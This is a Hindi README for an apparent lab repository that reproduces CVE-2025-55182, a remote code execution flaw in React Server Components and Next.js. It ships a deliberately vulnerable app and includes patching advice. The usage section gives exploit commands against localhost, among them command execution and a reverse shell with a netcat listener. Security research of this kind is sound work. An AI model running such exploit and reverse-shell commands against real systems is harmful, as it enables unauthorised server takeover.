
इस रिपॉजिटरी में CVE-2025-55182 का विश्लेषण और पुनरुत्पादन करने के लिए एक संपूर्ण वातावरण शामिल है, जो React Server Components (RSC) में एक गंभीर रिमोट कोड निष्पादन (RCE) भेद्यता है, जो React 19.x और Next.js 15.x को प्रभावित करती है।
⚠️ चेतावनी: इस प्रोजेक्ट में जानबूझकर भेद्य कोड शामिल है। इसे सार्वजनिक सर्वर या उत्पादन वातावरण में तैनात न करें।
react-server-dom-webpack, react-server-dom-turbopackयह भेद्यता React Server Components रनटाइम द्वारा HTTP अनुरोधों (Server Actions) से सीरियलाइज़्ड डेटा को संसाधित करने के तरीके में मौजूद है। एक हमलावर एक दुर्भावनापूर्ण "Flight" प्रोटोकॉल पेलोड तैयार कर सकता है, जो सर्वर द्वारा डिसीरियलाइज़ किए जाने पर, प्रमाणीकरण जाँच होने से पहले मनमाना कोड निष्पादित करता है।
react2shell/
├── vulnerable-app/ # Vulnerable Next.js 15 application
│ ├── app/
│ │ ├── actions.ts # Vulnerable Server Actions
│ │ └── page.tsx # UI for testing vulnerability
│ ├── Dockerfile # Container definition
│ └── package.json
├── exploit/ # Exploit tools
│ ├── exploit.py # Python PoC exploit
│ ├── scanner.py # Vulnerability scanner
│ └── quick_exploit.sh # Simple bash exploit
├── docs/ # Analysis documentation
└── docker-compose.yml # Isolated lab environment
भेद्य एप्लिकेशन को एक पृथक कंटेनर में चलाएँ:
docker-compose up -d --build
एप्लिकेशन http://localhost:3000 पर उपलब्ध होगा।
अपने ब्राउज़र में http://localhost:3000 पर जाएँ। आपको कई परीक्षण पैनलों के साथ "React2Shell Lab" इंटरफ़ेस देखना चाहिए:
हम भेद्यता का परीक्षण करने के लिए कई उपकरण प्रदान करते हैं।
आवश्यकताएँ स्थापित करें:
pip install -r exploit/requirements.txt
जाँचें कि क्या यह भेद्य है:
python3 exploit/exploit.py -u http://localhost:3000 --check
एक कमांड निष्पादित करें:
python3 exploit/exploit.py -u http://localhost:3000 -c "id"
रिवर्स शेल (एक लिसनर की आवश्यकता है, जैसे nc -lvnp 4444):
python3 exploit/exploit.py -u http://localhost:3000 --revshell -l HOST_IP -p 4444
भेद्य React/Next.js इंस्टेंस के लिए स्कैन करें:
python3 exploit/scanner.py -u http://localhost:3000
अपने स्वयं के अनुप्रयोगों में इस भेद्यता को ठीक करने के लिए:
निर्भरताएँ अपग्रेड करें:
पैच सत्यापित करें:
यह सुनिश्चित करने के लिए package.json जाँचें कि react-server-dom-* पैकेज अपडेटेड हैं।
यह प्रोजेक्ट केवल शैक्षिक उद्देश्यों और सुरक्षा अनुसंधान के लिए है। लेखक इस सामग्री के दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेते हैं।